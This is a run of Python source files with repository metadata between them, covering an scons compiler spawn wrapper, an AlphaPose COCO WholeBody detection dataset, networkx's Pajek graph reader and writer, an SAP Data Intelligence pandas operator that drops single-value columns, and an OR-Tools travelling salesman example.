            return 0

        # For quoted arguments that end in a backslash, things don't work well
        # this is a workaround for it.
        def removeTrailingSlashQuote(arg):
            if arg.endswith(r"\""):
                return arg[:-1] + '\\"'
            else:
                return arg

        newargs = " ".join(removeTrailingSlashQuote(arg) for arg in args[1:])
        cmdline = cmd + " " + newargs

        # Special hook for clcache inline copy
        if cmd == "<clcache>":
            data, err, rv = runClCache(args, env)
        else:
            data, err, rv = runProcessMonitored(cmdline, env)

        if cmd == "link":
            # Trailing newline in some cases, esp. LTO it seems.
            data = data.rstrip()

            if module_mode:
                data = b"\r\n".join(
                    line
                    for line in data.split(b"\r\n")
                    if b" Creating library" not in line
                    # On localized compilers, the message to ignore is not as clear.
                    if not (module_mode and b".exp" in line)
                )

            # The linker will say generating code at the end, due to localization
            # we don't know.
            if lto_mode:
                if len(data.split(b"\r\n")) == 2:
                    data = b""
        elif (
            cmd == "cl"
            or cmd == "<clcache>"
            or os.path.basename(cmd).lower() == "clcache.exe"
        ):
            # Skip forced output from cl.exe
            data = data[data.find(b"\r\n") + 2 :]

            source_basenames = [
                os.path.basename(source_file) for source_file in source_files
            ]

            # NOTE(review): the lines compared below are bytes while
            # source_basenames holds str, so on Python 3 the second membership
            # test can never match a source name — confirm whether the
            # basenames should be encoded here.
            def check(line):
                return line in (b"", b"Generating Code...") or line in source_basenames

            data = (
                b"\r\n".join(line for line in data.split(b"\r\n") if not check(line))
                + b"\r\n"
            )

        if data is not None and data.rstrip():
            my_print("Unexpected output from this command:", style="yellow")
            my_print(cmdline, style="yellow")

            if str is not bytes:
                data = decodeData(data)

            my_print(data, style="yellow", end="")

        if err:
            if str is not bytes:
                err = decodeData(err)

            my_print(err, style="yellow", end="")

        return rv

    return spawnWindowsCommand
def _unescape(arg):
# Undo the damage that scons did to pass it to "sh"
arg = arg.strip('"')
slash = "\\"
special = '"$()'
arg = arg.replace(slash + slash, slash)
for c in special:
arg = arg.replace(slash + c, c)
return arg
class SpawnThread(threading.Thread):
    """Runs a scons spawn call on a worker thread while timing it."""

    def __init__(self, spawn, *args):
        threading.Thread.__init__(self)

        self.spawn = spawn
        self.args = args

        # args[3] is the command argument list; un-escape it for readability
        # and double '%' so the text survives the later %-formatting
        readable_command = " ".join(_unescape(arg) for arg in self.args[3])
        self.timer_report = TimerReport(
            message="Running %s took %%.2f seconds"
            % (readable_command.replace("%", "%%"),),
            min_report_time=60,
            logger=scons_logger,
        )

        self.result = None

    def run(self):
        """Invoke the wrapped spawn and keep its return value."""
        with self.timer_report:
            self.result = self.spawn(*self.args)

    def getSpawnResult(self):
        """Return whatever the wrapped spawn call returned."""
        return self.result
def runSpawnMonitored(spawn, sh, escape, cmd, args, env):
    """Run a spawn call on a thread, warning once it exceeds a minute.

    Returns the spawn call's result.
    """
    worker = SpawnThread(spawn, sh, escape, cmd, args, env)
    worker.start()

    # Allow a minute before warning for long compile time.
    worker.join(60)
    if worker.is_alive():
        scons_logger.info(
            "Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
            % worker.timer_report.getTimer().getDelta()
        )

    worker.join()
    return worker.getSpawnResult()
def getWrappedSpawnFunction(spawn):
    """Return a drop-in spawn replacement that adds slow-command monitoring."""

    def spawnCommand(sh, escape, cmd, args, env):
        # delegate to the monitored runner with the original spawn attached
        return runSpawnMonitored(spawn, sh, escape, cmd, args, env)

    return spawnCommand
| 29.661224
| 103
| 0.584698
|
4a0f10ab6a03dc53468e295de2b2593e300c70e3
| 4,620
|
py
|
Python
|
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | 5
|
2020-09-11T09:06:17.000Z
|
2021-12-22T15:46:57.000Z
|
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | null | null | null |
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | 2
|
2020-09-11T09:06:20.000Z
|
2021-12-23T15:21:30.000Z
|
# -----------------------------------------------------
# Copyright (c) Shanghai Jiao Tong University. All rights reserved.
# Written by Haoyi Zhu
# -----------------------------------------------------
"""Coco WholeBody Human Detection Box dataset."""
import json
import os
import cv2
import torch
import torch.utils.data as data
from tqdm import tqdm
from alphapose.utils.presets import SimpleTransform
from detector.apis import get_detector
from alphapose.models.builder import DATASET
@DATASET.register_module
class coco_wholebody_det(data.Dataset):
    """ Coco WholeBody human detection box dataset.

    Wraps pre-computed (or on-demand) human detection boxes so each dataset
    item yields one transformed person crop ready for pose estimation.
    """
    # Joint indices used at evaluation time: all 133 whole-body keypoints.
    EVAL_JOINTS = list(range(133))

    def __init__(self,
                 det_file=None,
                 opt=None,
                 **cfg):
        # cfg comes from the dataset configuration: PRESET describes the
        # input transformation; ROOT/IMG_PREFIX locate the images; ANN is
        # the COCO-style annotation file; DET_FILE caches detections.
        self._cfg = cfg
        self._opt = opt
        self._preset_cfg = cfg['PRESET']
        self._root = cfg['ROOT']
        self._img_prefix = cfg['IMG_PREFIX']
        if not det_file:
            det_file = cfg['DET_FILE']
        self._ann_file = os.path.join(self._root, cfg['ANN'])

        # Reuse cached detection results when present; otherwise run the
        # detector over all annotated images and cache them to det_file.
        if os.path.exists(det_file):
            print("Detection results exist, will use it")
        else:
            print("Will create detection results to {}".format(det_file))
            self.write_coco_json(det_file)

        assert os.path.exists(det_file), "Error: no detection results found"
        with open(det_file, 'r') as fid:
            self._det_json = json.load(fid)

        self._input_size = self._preset_cfg['IMAGE_SIZE']
        self._output_size = self._preset_cfg['HEATMAP_SIZE']
        self._sigma = self._preset_cfg['SIGMA']
        if self._preset_cfg['TYPE'] == 'simple':
            # Evaluation-time transform: no scaling jitter, no rotation, no DPG.
            self.transformation = SimpleTransform(
                self, scale_factor=0,
                input_size=self._input_size,
                output_size=self._output_size,
                rot=0, sigma=self._sigma,
                train=False, add_dpg=False)

    def __getitem__(self, index):
        """Return the transformed crop plus metadata for detection *index*."""
        det_res = self._det_json[index]
        # image_id may be an int COCO id or a filename; normalise to int.
        if not isinstance(det_res['image_id'], int):
            img_id, _ = os.path.splitext(os.path.basename(det_res['image_id']))
            img_id = int(img_id)
        else:
            img_id = det_res['image_id']
        img_path = os.path.join(self._root, self._img_prefix, '%012d.jpg' % img_id)

        # Load image
        image = cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB)  # scipy.misc.imread(img_path, mode='RGB') is deprecated
        # NOTE(review): cv2 returns an (H, W, C) array, so shape[1]/shape[2]
        # are width and channel count rather than height and width — confirm
        # whether downstream consumers actually expect these exact values.
        imght, imgwidth = image.shape[1], image.shape[2]
        x1, y1, w, h = det_res['bbox']
        # Convert COCO xywh box to xyxy corners for the transform.
        bbox = [x1, y1, x1 + w, y1 + h]
        inp, bbox = self.transformation.test_transform(image, bbox)
        return inp, torch.Tensor(bbox), torch.Tensor([det_res['bbox']]), torch.Tensor([det_res['image_id']]), torch.Tensor([det_res['score']]), torch.Tensor([imght]), torch.Tensor([imgwidth])

    def __len__(self):
        """Number of detection boxes (one dataset item per detected person)."""
        return len(self._det_json)

    def write_coco_json(self, det_file):
        """Run the configured detector on every annotated image and dump the
        accumulated detections to *det_file* as JSON."""
        from pycocotools.coco import COCO
        import pathlib

        _coco = COCO(self._ann_file)
        image_ids = sorted(_coco.getImgIds())
        det_model = get_detector(self._opt)
        dets = []
        for entry in tqdm(_coco.loadImgs(image_ids)):
            abs_path = os.path.join(
                self._root, self._img_prefix, entry['file_name'])
            det = det_model.detect_one_img(abs_path)
            if det:
                dets += det
        # Make sure the target directory exists before writing the cache.
        pathlib.Path(os.path.split(det_file)[0]).mkdir(parents=True, exist_ok=True)
        json.dump(dets, open(det_file, 'w'))

    @property
    def joint_pairs(self):
        """Joint pairs which defines the pairs of joint to be swapped
        when the image is flipped horizontally."""
        return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16],
                [17, 20], [18, 21], [19, 22], [23, 39], [24, 38], [25, 37], [26, 36],
                [27, 35], [28, 34], [29, 33], [30, 32], [40, 49], [41, 48], [42, 47],
                [43, 46], [44, 45], [59, 68], [60, 67], [61, 66], [62, 65], [63, 70],
                [64, 69], [54, 58], [55, 57], [71, 77], [72, 76], [73, 75], [84, 86],
                [90, 88], [83, 87], [82, 78], [81, 79], [91, 112], [92, 113], [93, 114],
                [94, 115], [95, 116], [96, 117], [97, 118], [98, 119], [99, 120],
                [100, 121], [101, 122], [102, 123], [103, 124], [104, 125], [105, 126],
                [106, 127], [107, 128], [108, 129], [109, 130], [110, 131], [111, 132]]
| 40.173913
| 192
| 0.541991
|
4a0f10aebbd38b6bf719adbe5e4819aba98c4c05
| 8,489
|
py
|
Python
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 1
|
2019-12-03T14:58:04.000Z
|
2019-12-03T14:58:04.000Z
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 1
|
2019-12-19T16:49:00.000Z
|
2019-12-20T06:22:46.000Z
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 2
|
2020-02-13T10:33:34.000Z
|
2020-08-09T07:59:26.000Z
|
"""
*****
Pajek
*****
Read graphs in Pajek format.
This implementation handles directed and undirected graphs including
those with self loops and parallel edges.
Format
------
See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
for format information.
"""
import warnings
import networkx as nx
from networkx.utils import open_file
__all__ = ['read_pajek', 'parse_pajek', 'generate_pajek', 'write_pajek']
def generate_pajek(G):
    """Generate lines in Pajek graph format.

    Parameters
    ----------
    G : graph
       A Networkx graph

    Yields
    ------
    str
        One line of the Pajek file: the ``*vertices`` header, one line per
        node, then the ``*arcs``/``*edges`` header and one line per edge.
        Optional attributes are written only when they are non-empty strings.

    References
    ----------
    See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
    for format information.
    """
    if G.name == '':
        name = 'NetworkX'
    else:
        name = G.name
    # Apparently many Pajek format readers can't process this line
    # So we'll leave it out for now.
    # yield '*network %s'%name

    # write nodes with attributes
    yield '*vertices %s' % (G.order())
    nodes = list(G)
    # make dictionary mapping nodes to integers
    nodenumber = dict(zip(nodes, range(1, len(nodes) + 1)))
    for n in nodes:
        # copy node attributes and pop mandatory attributes
        # to avoid duplication.
        na = G.nodes.get(n, {}).copy()
        x = na.pop('x', 0.0)
        y = na.pop('y', 0.0)
        # An explicit 'id' attribute overrides the positional numbering.
        id = int(na.pop('id', nodenumber[n]))
        nodenumber[n] = id
        shape = na.pop('shape', 'ellipse')
        s = ' '.join(map(make_qstr, (id, n, x, y, shape)))
        # only optional attributes are left in na.
        for k, v in na.items():
            if isinstance(v, str) and v.strip() != '':
                s += ' %s %s' % (make_qstr(k), make_qstr(v))
            else:
                # Non-string or empty attributes cannot be represented in
                # Pajek; warn instead of writing malformed output.
                warnings.warn('Node attribute %s is not processed. %s.' %
                              (k,
                               'Empty attribute' if isinstance(v, str) else
                               'Non-string attribute'))
        yield s

    # write edges with attributes
    if G.is_directed():
        yield '*arcs'
    else:
        yield '*edges'
    for u, v, edgedata in G.edges(data=True):
        d = edgedata.copy()
        value = d.pop('weight', 1.0)  # use 1 as default edge value
        s = ' '.join(map(make_qstr, (nodenumber[u], nodenumber[v], value)))
        for k, v in d.items():
            if isinstance(v, str) and v.strip() != '':
                s += ' %s %s' % (make_qstr(k), make_qstr(v))
            else:
                warnings.warn('Edge attribute %s is not processed. %s.' %
                              (k,
                               'Empty attribute' if isinstance(v, str) else
                               'Non-string attribute'))
        yield s
@open_file(1, mode='wb')
def write_pajek(G, path, encoding='UTF-8'):
    """Write graph *G* to *path* in Pajek format.

    Parameters
    ----------
    G : graph
       A Networkx graph
    path : file or string
       File or filename to write.
       Filenames ending in .gz or .bz2 will be compressed.

    Examples
    --------
    >>> G = nx.path_graph(4)
    >>> nx.write_pajek(G, "test.net")

    Warnings
    --------
    Optional node attributes and edge attributes must be non-empty strings.
    Otherwise it will not be written into the file. You will need to
    convert those attributes to strings if you want to keep them.

    References
    ----------
    See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
    for format information.
    """
    # open_file hands us a binary file object; encode each generated line.
    for record in generate_pajek(G):
        path.write(('%s\n' % record).encode(encoding))
@open_file(0, mode='rb')
def read_pajek(path, encoding='UTF-8'):
    """Read a graph in Pajek format from *path*.

    Parameters
    ----------
    path : file or string
       File or filename to read.
       Filenames ending in .gz or .bz2 will be uncompressed.

    Returns
    -------
    G : NetworkX MultiGraph or MultiDiGraph.

    Examples
    --------
    >>> G = nx.path_graph(4)
    >>> nx.write_pajek(G, "test.net")
    >>> G = nx.read_pajek("test.net")

    To create a Graph instead of a MultiGraph use

    >>> G1 = nx.Graph(G)

    References
    ----------
    See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
    for format information.
    """
    # Decode the binary stream lazily and delegate parsing.
    return parse_pajek(raw.decode(encoding) for raw in path)
def parse_pajek(lines):
    """Parse Pajek format graph from string or iterable.

    Parameters
    ----------
    lines : string or iterable
       Data in Pajek format.

    Returns
    -------
    G : NetworkX graph
       Starts as a MultiDiGraph; may be converted to MultiGraph (``*edges``)
       or DiGraph (``*matrix``) depending on the sections encountered.

    See Also
    --------
    read_pajek()

    """
    import shlex
    # multigraph=False
    if isinstance(lines, str):
        lines = iter(lines.split('\n'))
    lines = iter([line.rstrip('\n') for line in lines])
    G = nx.MultiDiGraph()  # are multiedges allowed in Pajek? assume yes
    labels = []  # in the order of the file, needed for matrix
    while lines:
        try:
            l = next(lines)
        except:  # EOF
            break
        if l.lower().startswith("*network"):
            try:
                label, name = l.split(None, 1)
            except ValueError:
                # Line was not of the form:  *network NAME
                pass
            else:
                G.graph['name'] = name
        elif l.lower().startswith("*vertices"):
            nodelabels = {}
            l, nnodes = l.split()
            for i in range(int(nnodes)):
                l = next(lines)
                # shlex honours Pajek's quoted labels; the encode/decode
                # round-trip handles byte input, falling back for plain str.
                try:
                    splitline = [x.decode('utf-8') for x in
                                 shlex.split(str(l).encode('utf-8'))]
                except AttributeError:
                    splitline = shlex.split(str(l))
                id, label = splitline[0:2]
                labels.append(label)
                G.add_node(label)
                nodelabels[id] = label
                G.nodes[label]['id'] = id
                # Optional x/y/shape triple; silently skipped when absent.
                try:
                    x, y, shape = splitline[2:5]
                    G.nodes[label].update({'x': float(x),
                                           'y': float(y),
                                           'shape': shape})
                except:
                    pass
                # Remaining tokens are key/value attribute pairs.
                extra_attr = zip(splitline[5::2], splitline[6::2])
                G.nodes[label].update(extra_attr)
        elif l.lower().startswith("*edges") or l.lower().startswith("*arcs"):
            if l.lower().startswith("*edge"):
                # switch from multidigraph to multigraph
                G = nx.MultiGraph(G)
            if l.lower().startswith("*arcs"):
                # switch to directed with multiple arcs for each existing edge
                G = G.to_directed()
            # Consume the rest of the stream as edge records.
            for l in lines:
                try:
                    splitline = [x.decode('utf-8') for x in
                                 shlex.split(str(l).encode('utf-8'))]
                except AttributeError:
                    splitline = shlex.split(str(l))

                if len(splitline) < 2:
                    continue
                ui, vi = splitline[0:2]
                # Map numeric ids back to labels; fall back to the raw token.
                u = nodelabels.get(ui, ui)
                v = nodelabels.get(vi, vi)
                # parse the data attached to this edge and put in a dictionary
                edge_data = {}
                try:
                    # there should always be a single value on the edge?
                    w = splitline[2:3]
                    edge_data.update({'weight': float(w[0])})
                except:
                    pass
                    # if there isn't, just assign a 1
#                    edge_data.update({'value':1})
                extra_attr = zip(splitline[3::2], splitline[4::2])
                edge_data.update(extra_attr)
                # if G.has_edge(u,v):
                #     multigraph=True
                G.add_edge(u, v, **edge_data)
        elif l.lower().startswith("*matrix"):
            # Adjacency-matrix section: one row per node, zero means no edge.
            G = nx.DiGraph(G)
            adj_list = ((labels[row], labels[col], {'weight': int(data)})
                        for (row, line) in enumerate(lines)
                        for (col, data) in enumerate(line.split())
                        if int(data) != 0)
            G.add_edges_from(adj_list)

    return G
def make_qstr(t):
    """Return *t* rendered as a string, wrapped in double quotes when it
    contains a space (as required by the Pajek format)."""
    text = t if isinstance(t, str) else str(t)
    return '"%s"' % text if " " in text else text
| 31.095238
| 78
| 0.508658
|
4a0f10c57ead0b675bc0aa1040d61a1377f7cc70
| 5,522
|
py
|
Python
|
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | 2
|
2020-01-02T19:54:46.000Z
|
2020-03-09T08:49:33.000Z
|
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | null | null | null |
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | 1
|
2020-03-28T22:53:16.000Z
|
2020-03-28T22:53:16.000Z
|
import os
import pandas as pd
import sdi_utils.gensolution as gs
import sdi_utils.set_logging as slog
import sdi_utils.tprogress as tp
import sdi_utils.textfield_parser as tfp
try:
api
except NameError:
    class api:
        # Stand-in for the SAP Data Intelligence `api` object so this script
        # can be developed and tested outside the pipeline runtime (the real
        # `api` only exists inside SAP DI; see the surrounding try/except).
        class config:
            ## Meta data
            tags = {'python36': '','sdi_utils':''} # tags that helps to select the appropriate container
            operator_description = 'Drop Single Value Columns'
            operator_description_long='Drops columns of DataFrame with only one unique value.'
            version = "0.0.1" # for creating the manifest.json
            add_readme = dict()
            add_readme["References"] =""
            config_params = dict()
            ## config paramter
            debug_mode = True
            config_params['debug_mode'] = {'title': 'Debug mode',
                                           'description': 'Sending debug level information to log port',
                                           'type': 'boolean'}
            columns = 'All'
            config_params['columns'] = {'title': 'Columns', 'description': 'Columns to check for 1 unique value', 'type': 'string'}
            info_only = 'True'
            config_params['info_only'] = {'title': 'Info only', 'description': 'Only check without data modification.', 'type': 'boolean'}

        class Message:
            # Minimal replica of the DI message: a payload plus attributes.
            def __init__(self,body = None,attributes = ""):
                self.body = body
                self.attributes = attributes

        def send(port,msg) :
            # Test double: print to stdout instead of emitting on an outport.
            if isinstance(msg,api.Message) :
                print('Port: ', port)
                print('Attributes: ', msg.attributes)
                print('Body: ', str(msg.body))
            else :
                print(str(msg))
            return msg

        def set_port_callback(port, callback) :
            # Test double: immediately invoke the callback with sample data.
            df = pd.DataFrame(
                {'icol': [1, 1, 1, 1, 2], 'xcol2': ['A', 'A', 'B', 'B', 'C'], 'xcol3': ['A', 'A', 'C', 'D', 'E'],
                 'xcol4': ['a', 'A', 'b', 'a', 'c'],'xcol5': ['X', 'A', 'B', 'B', 'C']})
            default_msg = api.Message(attributes={'format': 'csv', 'name': 'DF_name'}, body=df)
            callback(default_msg)
def call(config,msg):
    """Install *config* as the operator configuration, then process *msg*.

    Returns the (log, data message, transformation message) tuple
    produced by process().
    """
    api.config = config
    return process(msg)
def process(msg):
    """Drop (or only report) DataFrame columns holding a single unique value.

    :param msg: api.Message whose body is a pandas DataFrame.
    :return: tuple of (log string, data Message carrying the possibly
             reduced DataFrame, transformation Message carrying a DataFrame
             that describes each single-value column found).
    """
    att_dict = dict()
    att_dict['config'] = dict()

    att_dict['operator'] = 'drop_1valuecolumns'
    logger, log_stream = slog.set_logging(att_dict['operator'])
    if api.config.debug_mode == True:
        logger.setLevel('DEBUG')

    time_monitor = tp.progress()
    logger.debug('Start time: ' + time_monitor.get_start_time())

    df = msg.body
    prev_shape = df.shape

    # Columns with 1 unique value
    columns = tfp.read_list(api.config.columns,df.columns)
    col1val_data = {'column': [], 'type': [], 'unique_vals': [], 'action': []}
    for col in columns:
        vals = df[col].unique()
        if len(vals) == 1:
            # Record the column; drop it in place unless info_only is set.
            col1val_data['column'].append(col)
            col1val_data['type'].append(str(df[col].dtype))
            col1val_data['unique_vals'].append(vals)
            col1val_data['action'].append('drop')
            if not api.config.info_only:
                df.drop(columns=[col], inplace=True)

    logger.debug('End time: ' + time_monitor.elapsed_time())

    # Collect bookkeeping about the resulting DataFrame for the log.
    att_dict['memory'] = df.memory_usage(deep=True).sum() / 1024 ** 2
    att_dict['columns'] = str(list(df.columns))
    att_dict['shape'] = df.shape
    att_dict['id'] = str(id(df))

    logger.debug('Columns: {}'.format(str(df.columns)))
    logger.debug('Shape (#rows - #columns): {} - {}'.format(df.shape[0], df.shape[1]))
    logger.debug('Memory: {} kB'.format(att_dict['memory']))
    logger.debug('Dropped columns: {}'.format(prev_shape[1] - df.shape[1]))
    logger.info('Dropped columns: {}'.format(prev_shape[1] - df.shape[1]))

    return log_stream.getvalue(), api.Message(attributes={'name':'drop_duplicates','type':'DataFrame'},body=df),\
           api.Message(attributes={'name':'transformation','type':'DataFrame'},body=pd.DataFrame(col1val_data))
inports = [{"name":"data","type":"message.DataFrame","description":"Input data"}]
outports = [{"name":"log","type":"string","description":"Logging"},\
{"name":"transformation","type":"message.DataFrame","description":"Transformation data"},\
{"name":"data","type":"message.DataFrame","description":"Output data"}]
def call_on_input(msg) :
    """Inport callback: process the message and emit log, transformation
    and data on the corresponding outports."""
    log, data, transformation_data = process(msg)
    api.send(outports[0]['name'], log)
    api.send(outports[1]['name'], transformation_data)
    api.send(outports[2]['name'], data)
api.set_port_callback(inports[0]['name'], call_on_input)
def main() :
    """Local smoke test: run the operator once with the default sample data,
    then once with a custom config that actually drops columns, and finally
    regenerate the solution artefacts."""
    print('Test: Default')
    api.set_port_callback(inports[0]['name'], call_on_input)

    print('Test: config')
    config = api.config
    config.columns = 'All'
    config.info_only = False
    # 'icol' and 'xcol5' each hold a single unique value and should be dropped.
    df = pd.DataFrame(
        {'icol': [1, 1, 1, 1, 1], 'xcol2': ['A', 'A', 'B', 'B', 'C'], 'xcol3': ['A', 'A', 'C', 'D', 'E'],
         'xcol4': ['A', 'A', 'b', 'a', 'c'], 'xcol5': ['A', 'A', 'A', 'A', 'A']})
    test_msg = api.Message(attributes={'name':'test1'},body =df)
    log, data, trans = api.call(config,test_msg)
    print('Attributes: ', data.attributes)
    print('Body: ', str(data.body))
    print('Attributes: ', trans.attributes)
    print('Body: ', str(trans.body))
    print('Logging: ')
    print(log)

    # Regenerate the operator solution package (manifest, README, ...).
    gs.gensolution(os.path.realpath(__file__), config, inports, outports,override_readme=True)
| 39.163121
| 138
| 0.576965
|
4a0f10d743a48909a1c04f779b9e1688cd8b1147
| 4,954
|
py
|
Python
|
examples/python/tsp.py
|
prezaei85/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | 3
|
2021-12-11T12:30:09.000Z
|
2021-12-30T09:49:45.000Z
|
examples/python/tsp.py
|
kamyu104/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | null | null | null |
examples/python/tsp.py
|
kamyu104/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2017 Google
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traveling Salesman Sample.
This is a sample using the routing library python wrapper to solve a
Traveling Salesman Problem.
The description of the problem can be found here:
http://en.wikipedia.org/wiki/Travelling_salesman_problem.
The optimization engine uses local search to improve solutions, first
solutions being generated using a cheapest addition heuristic.
Optionally one can randomly forbid a set of random connections between nodes
(forbidden arcs).
"""
import random
import argparse
from ortools.constraint_solver import pywrapcp
# You need to import routing_enums_pb2 after pywrapcp!
from ortools.constraint_solver import routing_enums_pb2
parser = argparse.ArgumentParser()
parser.add_argument('--tsp_size', default = 10, type = int,
help='Size of Traveling Salesman Problem instance.')
parser.add_argument('--tsp_use_random_matrix', default=True, type=bool,
help='Use random cost matrix.')
parser.add_argument('--tsp_random_forbidden_connections', default = 0,
type = int, help='Number of random forbidden connections.')
parser.add_argument('--tsp_random_seed', default = 0, type = int,
help = 'Random seed.')
parser.add_argument('--light_propagation', default = False,
type = bool, help = 'Use light propagation')
# Cost/distance functions.
def Distance(i, j):
    """Sample distance callback: cost of travelling between nodes *i* and *j*.

    Placeholder implementation — replace with a real metric as needed.
    """
    # Put your distance code here.
    return j + i
class RandomMatrix(object):
  """Square matrix of reproducible random inter-node distances.

  The diagonal is zero; every other entry is drawn uniformly from
  [0, 100) using the given seed, so two instances built with the same
  (size, seed) are identical.
  """

  def __init__(self, size, seed):
    """Fill a size x size distance matrix deterministically from *seed*."""
    rand = random.Random()
    rand.seed(seed)
    distance_max = 100
    # Row-major fill; randrange is only consumed for off-diagonal cells.
    self.matrix = {
        row: {
            col: 0 if row == col else rand.randrange(distance_max)
            for col in range(size)
        }
        for row in range(size)
    }

  def Distance(self, from_node, to_node):
    """Return the stored distance from *from_node* to *to_node*."""
    return self.matrix[from_node][to_node]
def main(args):
  """Build and solve a random TSP instance described by *args*.

  Creates a single-vehicle routing model of args.tsp_size nodes, optionally
  forbids random arcs, solves, and prints the objective value and route.
  """
  # Create routing model
  if args.tsp_size > 0:
    # TSP of size args.tsp_size
    # Second argument = 1 to build a single tour (it's a TSP).
    # Nodes are indexed from 0 to parser_tsp_size - 1, by default the start of
    # the route is node 0.
    routing = pywrapcp.RoutingModel(args.tsp_size, 1, 0)
    # NOTE(review): search_parameters is built but routing.Solve() below does
    # not use it (SolveWithParameters is commented out).
    search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
    # Setting first solution heuristic (cheapest addition).
    search_parameters.first_solution_strategy = (
        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)

    # Setting the cost function.
    # Put a callback to the distance accessor here. The callback takes two
    # arguments (the from and to node inidices) and returns the distance between
    # these nodes.
    matrix = RandomMatrix(args.tsp_size, args.tsp_random_seed)
    matrix_callback = matrix.Distance
    if args.tsp_use_random_matrix:
      routing.SetArcCostEvaluatorOfAllVehicles(matrix_callback)
    else:
      routing.SetArcCostEvaluatorOfAllVehicles(Distance)
    # Forbid node connections (randomly).
    rand = random.Random()
    rand.seed(args.tsp_random_seed)
    forbidden_connections = 0
    while forbidden_connections < args.tsp_random_forbidden_connections:
      from_node = rand.randrange(args.tsp_size - 1)
      to_node = rand.randrange(args.tsp_size - 1) + 1
      if routing.NextVar(from_node).Contains(to_node):
        print('Forbidding connection ' + str(from_node) + ' -> ' + str(to_node))
        routing.NextVar(from_node).RemoveValue(to_node)
        forbidden_connections += 1

    # Solve, returns a solution if any.
    # assignment = routing.SolveWithParameters(search_parameters)
    assignment = routing.Solve()
    if assignment:
      # Solution cost.
      print(assignment.ObjectiveValue())
      # Inspect solution.
      # Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
      route_number = 0
      node = routing.Start(route_number)
      route = ''
      while not routing.IsEnd(node):
        route += str(node) + ' -> '
        node = assignment.Value(routing.NextVar(node))
      route += '0'
      print(route)
    else:
      print('No solution found.')
  else:
    print('Specify an instance greater than 0.')
if __name__ == '__main__':
main(parser.parse_args())
| 36.426471
| 80
| 0.700646
|
4a0f12b1bca59554bd78e74460f1c1fb54337c0f
| 61
|
py
|
Python
|
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | null | null | null |
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | 30
|
2020-01-10T21:20:52.000Z
|
2022-03-12T00:25:41.000Z
|
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | null | null | null |
"""Blog tests."""
# Django
from django.test import TestCase
| 12.2
| 32
| 0.704918
|
4a0f12e4ed7cbbd6a8a5275896e9870e61a4aae0
| 146
|
py
|
Python
|
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
from huobi.constant.definition import *
from huobi.constant.result import *
from huobi.constant.system import *
from huobi.constant.test import *
| 29.2
| 39
| 0.808219
|
4a0f137446af2599aeb98c92a3ad09cf7ec3bd55
| 2,317
|
py
|
Python
|
magnum/tests/functional/api/v1/models/baypatch_model.py
|
